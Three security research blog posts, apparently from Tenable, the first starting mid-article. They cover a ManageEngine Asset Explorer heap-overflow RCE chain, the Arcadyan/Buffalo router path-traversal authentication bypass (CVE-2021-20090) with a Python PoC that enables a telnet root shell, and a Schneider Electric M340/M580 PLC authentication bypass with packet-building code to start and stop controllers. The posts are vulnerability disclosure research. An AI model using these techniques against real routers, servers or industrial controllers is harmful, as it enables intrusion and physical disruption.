4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this would ideally involve some grooming, so we could trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately, my heap grooming attempts were not able to force allocations where I wanted. This is partially due to the limited sizes I was able to remotely allocate in the remote process, and in large part due to my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts, since I am only overwriting the linked list pointers of heap cells, and the heap manager was apparently very OK with that. With that in mind, I run my heap overflow several times and hope it writes over the particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up hitting the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed, because that's the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to that string. Without knowing my own string's address, I have no idea what to write. Luckily, I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC, I initially send the following string to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string once received and allocate a unicode string for each substring delimited by the “#” symbols. Since heap cells are tracked in a doubly linked list, these sequential allocations will be appended to the list in order (new cells are inserted at the head of the list, so an existing cell's *prev ends up pointing at the cell allocated immediately after it). So, what I need to do is overflow into the heap cell header for the “XXXXXXXX2” string, with the understanding that its _CrtMemBlockHeader *prev pointer will point to the next heap cell to be allocated, which is always the “//.//…//UNC//127.0.0.1/a/” SMB path string shown above.

If we overwrite the _CrtMemBlockHeader *next pointer with the .data address of the current working directory pointer, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader *prev pointer, then we won't need an info leak. Since the upper three bytes dictate the SMB string's general memory address, we just need to offset the last byte so that it points to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I chose to overwrite the lowest order byte with 0xf8, to guarantee the maximum offset from the _CrtMemBlockHeader.

It's beneficial if we can craft an SMB path string with nonsense characters prepended to it (similar to a NOP sled, but for a file path). This will give us a greater probability that our 0xf8 offset points somewhere in our SMB path string that SetCurrentDirectory can interpret as a valid path with prepended nonsense characters (ie: .\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn't work for an SMB share, so thanks go to Chris Lyne, who was able to craft a nicely padded SMB path for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to simply be treated as “//<ip_address>/a/”. If we provide enough “//.” sequences in front of our path, we will have about a ⅓ chance of the 0xf8 offset landing properly in our sled when overwriting the lowest *prev byte. Much better odds than if I had used a simple, straightforward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent which will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll, so it should attempt to load it from its current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can't just write this GetPdbDll function address as a return address on stack memory, nor can I overwrite a function pointer with it. There was one place, however, where I saw a pointer TO a function pointer being called, which is actually possible for me to abuse. It's in the _CrtDbgReport function, which allows the Microsoft runtime to alert in the event of various integrity violations, one of which is a failure in a heap integrity check. When using a debug heap (like in this scenario), it can be triggered if it detects unwritten portions of heap memory not containing 0xfd bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However, this time… we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but we can leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in the .data section too!). This is also great because it doesn't have to be a pointer to executable memory (which we can't write), because _pfnReportHook contains a pointer TO a function pointer (a big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to the function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier, where subsequent heap cell allocations were used to bypass the infoleak. That unique scenario only applied to unicode strings in this application, and we can't represent our function pointers with unicode. For this step I chose to overwrite the _pfnReportHook variable with an essentially random offset into my heap (again, no infoleak required; a similar partial-overwrite technique as before, but this time overwriting the lower two bytes of the _CrtMemBlockHeader *next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdbDll function.

Yes, this will certainly crash the program, but that's OK! We are at the finish line, and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap, which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable's PoC github: https://github.com/tenable/poc. ManageEngine has since patched this issue. For more details, you can check out the research advisory at https://www.tenable.com/security/research.



Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo

3 August 2021 at 13:03

A while back I was browsing Amazon Japan for their best selling networking equipment/routers (as one does). I had never taken apart or hunted for vulnerabilities in a router and was interested in taking a crack at it. I came across the Buffalo WSR-2533DHP3 which was, at the time, the third best selling device on the list. Unfortunately, the sellers didn’t ship to Canada, so I instead bought the closely related Buffalo WSR-2533DHPL2 (though I eventually got my hands on the WSR-2533DHP3 as well).

In the following sections we will look at how I took the Buffalo devices apart, did a not-so-great solder job, and used a shell offered up on UART to help find a couple of bugs that could let users bypass authentication to the web interface and enable a root BusyBox shell on telnet.

At the end, we will also take a quick look at how I discovered that the authentication bypass vulnerability was not limited to the Buffalo routers, and how it affects at least a dozen other models from multiple vendors spanning a period of over ten years.

Root shells on UART

It is fairly common for devices like these Buffalo routers to offer up a shell via a serial connection known as Universal Asynchronous Receiver/Transmitter (UART) on the circuit board. Manufacturers often leave test points or unpopulated pads on the circuit board for accessing UART. These are often used for debugging or testing the device during manufacture. In this case, we were extremely lucky that, after some poor soldering and testing, the WSR-2533DHPL2 offered up a BusyBox shell as root over UART.

In case this is new to anyone, let’s quickly walk through this process (there are many articles out there on the web with a more detailed walkthrough on hardware hacking and UART shells).

The first step is for us to open up the router’s case and try to identify if there is a way to access UART.

UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we're using (3.3V, found using the multimeter earlier), we can run a UART scan, which will try sending a carriage return (or some other specified bytes) and receiving on each pin, at different bauds. This helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, let’s see if we can get around it. Searching for where it is referenced in Ghidra, we can see that it is only called from one other function, process_request(), which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that uVar1 (set on line 43) is checked before the output of evaluate_access(). This means that if bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we effectively skip the authentication check, and the request goes through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list and comparing the first n bytes of __dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.
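
To make the flaw concrete, here is a minimal Python re-creation of that prefix check (the function and list names come from the Ghidra output above; the exact contents of bypass_list beyond the pages mentioned are assumed):

# Approximation of the flawed strncmp-style check in httpd
BYPASS_LIST = ["/images/", "/login.html", "/loginerror.html"]  # partial, assumed

def bypass_check(dest: str) -> bool:
    # Only the first len(entry) bytes of the URL are compared, so any URL
    # that merely starts with a whitelisted prefix skips evaluate_access()
    return any(dest.startswith(entry) for entry in BYPASS_LIST)

assert bypass_check("/images/..%2finfo.html")  # traversal sails through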

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests made to js files

Looking at the Burp traffic, we can see a number of requests to /cgi/<various_nifty_cgi>.js returning 404s; these are the requests which normally return all of the info we’re looking for. We also see that a couple of parameters are passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token; where and how these are generated is covered in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that a fair amount of debugging output is printed when errors occur. Stopping the default httpd process and running it from our shell lets us see this output easily, which may help us identify the issue with the current request.

requests failing due to improper Referer header

Without diving into url_token_pass, we can see that it is saying that the httoken is invalid from http://192.168.11.1/images/..%2finfo.html. We will dive into httokens next, but the token we have here is correct, which means the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite to strip the /images/..%2f from the Referer header, we can see the info table, confirming our ability to bypass authentication.

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function getToken(), but getToken() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined, we see a strange string being defined.

Looking into where it is used, we find the following snippet.

Which, when run, adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something just as strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

In Ghidra, we can find the function where the httoken is inserted into the img tag.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored, encoded, in the img tags at the bottom of any given page when it loads.
  • They are then decoded in client-side JavaScript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first things I check in any web interface or application with utilities like a ping function is how those utilities are implemented, because even a quick Google search turns up a number of historic examples of router ping utilities being prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline character (%0A when url-encoded) followed by some text, to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after the %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.

It was unclear whether simply injecting ARC_SYS_TelnetdEnable=1 into the configuration file would work, as it would then be followed by a conflicting setting later in the file (ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipaddress). It worked anyway: we sent the following request in Burp Suite, followed by a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
Running a quick PoC against the WSR-2533DHPL2
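
For anyone curious, here is a heavily hedged sketch of what such a script might look like (apply_abstract.cgi and ARC_ping_ipaddress come from the analysis above; the reboot field name is a placeholder, and the httoken is passed in by hand since decoding it would mean porting the device’s getToken() JavaScript):

# Hedged PoC sketch for CVE-2021-20090 -- illustrative only
import sys
import requests

TARGET = "http://192.168.11.1"
TRAVERSAL = "/images/..%2f"   # prefix that defeats bypass_check()

def main():
    httoken = sys.argv[1]     # decoded token grabbed from a spacer img tag
    session = requests.Session()
    # The Referer must not contain the traversal, or url_token_pass
    # rejects the request; it must also match the token's source page.
    headers = {"Referer": TARGET + "/login.html"}
    # Newline-inject the telnetd setting via the ping host field...
    session.post(TARGET + TRAVERSAL + "apply_abstract.cgi", headers=headers,
                 data={"httoken": httoken,
                       "ARC_ping_ipaddress": "127.0.0.1\nARC_SYS_TelnetdEnable=1"})
    # ...then reboot so the change takes effect ("ARC_SYS_Reboot" is a guess)
    session.post(TARGET + TRAVERSAL + "apply_abstract.cgi", headers=headers,
                 data={"httoken": httoken, "ARC_SYS_Reboot": "1"})

if __name__ == "__main__":
    main()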

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed a number of devices which presented similar web interfaces to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and javascript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line, given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices, it became clear that not all of them were created equal and that the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on, it became clear that many more vendors were affected, and contacting and tracking them all would become very difficult, so on May 18th Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in Tenable’s advisory, and more information is available on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.

Takeaways

The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!


Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

13 July 2021 at 14:31

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors (thermostats, pressure, proximity, and so on) and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation: it typically runs an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by that underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. Stuxnet) to make it into these environments when engineers or technicians plug outside equipment into the network, such as laptops for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all; some vendors claim that enforcing security is the responsibility of an intermediary system.

As a result of this somewhat lax standpoint towards security in industrial automation, a few recent attacks have made the news.

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols: FTP and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find more information about the UMAS protocol, and a breakdown of the various message types, in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.
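
To make the framing concrete, here is a short Python sketch that builds and sends a READ_ID request from scratch (the PLC address is a placeholder, and treating the byte between 0x5a and the packet type as a session byte that is zero when no reservation is held is an assumption based on the exchanges described here):

# Build a Modbus/TCP frame carrying a UMAS READ_ID (0x02) request
import socket
import struct

def umas_request(transaction_id, umas_type, data=b""):
    # Function code 0x5a, a session byte (0x00 when none held),
    # the UMAS packet type, then any payload bytes
    pdu = bytes([0x5A, 0x00, umas_type]) + data
    # MBAP header: transaction id, protocol id (0), remaining length, unit id
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, 0)
    return mbap + pdu

with socket.create_connection(("192.168.1.100", 502)) as sock:  # PLC IP assumed
    sock.sendall(umas_request(1, 0x02))  # 0x02 = READ_ID
    print(sock.recv(1024).hex())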

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (from version 3.01 on 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), or even uploading a new project to the controller if an application password is configured under the “Project & Controller Protection” tab in the project properties. Because the mechanism is improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation,” you first need to generate a 32-byte random nonce (a nonce being a random number generated once per session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

“pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n”. 

You do not need to know the actual password to generate this SHA256.
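
In Python terms, the reservation hash amounts to something like this (the nonces below are placeholders; base64_str is the value read from the memory block earlier):

import hashlib

base64_str = b"pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n"
client_nonce = bytes(32)   # placeholder: the 32 random bytes we generated
server_nonce = bytes(32)   # placeholder: the 32 bytes the PLC sent back

reservation_hash = hashlib.sha256(server_nonce + base64_str + client_nonce).hexdigest()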

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = "\x5a" + check_byte + "\x40\xff\x00"

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = ("\x5a" + check_byte + "\x38\x01" + auth_hash + to_send)
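
Note that the fragments above mix text literals with raw digests; in Python 3 everything needs to be bytes end to end. A consolidated, hedged sketch with placeholder values:

import hashlib

hardware_id = bytes.fromhex("06010301")   # from the info request (0x02)
check_byte = b"\xc9"                      # from the reservation response
client_nonce = bytes(32)                  # placeholders, as before
server_nonce = bytes(32)

to_send = b"\x5a" + check_byte + b"\x40\xff\x00"   # start-PLC request

auth_hash_pre = hashlib.sha256(hardware_id + client_nonce).digest()
auth_hash_post = hashlib.sha256(hardware_id + server_nonce).digest()
auth_hash = hashlib.sha256(auth_hash_pre + to_send + auth_hash_post).digest()

start_plc_pkt = b"\x5a" + check_byte + b"\x38\x01" + auth_hash + to_send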

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using a temporal key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak custom algorithm of unknown provenance, which is not cryptographically sound, is used; it reveals the length of the password (the length of the hash equals the length of the password).

Program and Safety Protection Password Crypted Option

If the “Crypted” box isn’t checked, this password is stored in plaintext, which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to generate a nonce is to use a cryptographically secure random number generator.
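
For instance, in Python this is a one-liner with the standard library’s secrets module:

# 32 bytes from the OS CSPRNG -- unpredictable, unlike timestamp mash-ups
import secrets
nonce = secrets.token_bytes(32)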

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password are stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller were stolen, it might be possible for an attacker to recover this password.
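
As a sketch of the suggested fix, here is a salted, memory-hard hash using only the Python standard library (the parameters are illustrative, not values tuned for this hardware):

# Store salt + digest instead of the password or any reversible encoding
import hashlib
import secrets

password = b"hunter2"                  # illustrative only
salt = secrets.token_bytes(16)
digest = hashlib.scrypt(password, salt=salt, n=2**14, r=8, p=1)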

Conclusion

What on the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. Security is as critical as the waterproofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security: you can’t trust the client. You have to verify every interaction server-side. You cannot rely on client-side software (a.k.a. the “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another violated tenet: don’t roll your own crypto. There are plenty of standard cryptographic algorithms implemented in well-tested, well-designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement them yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

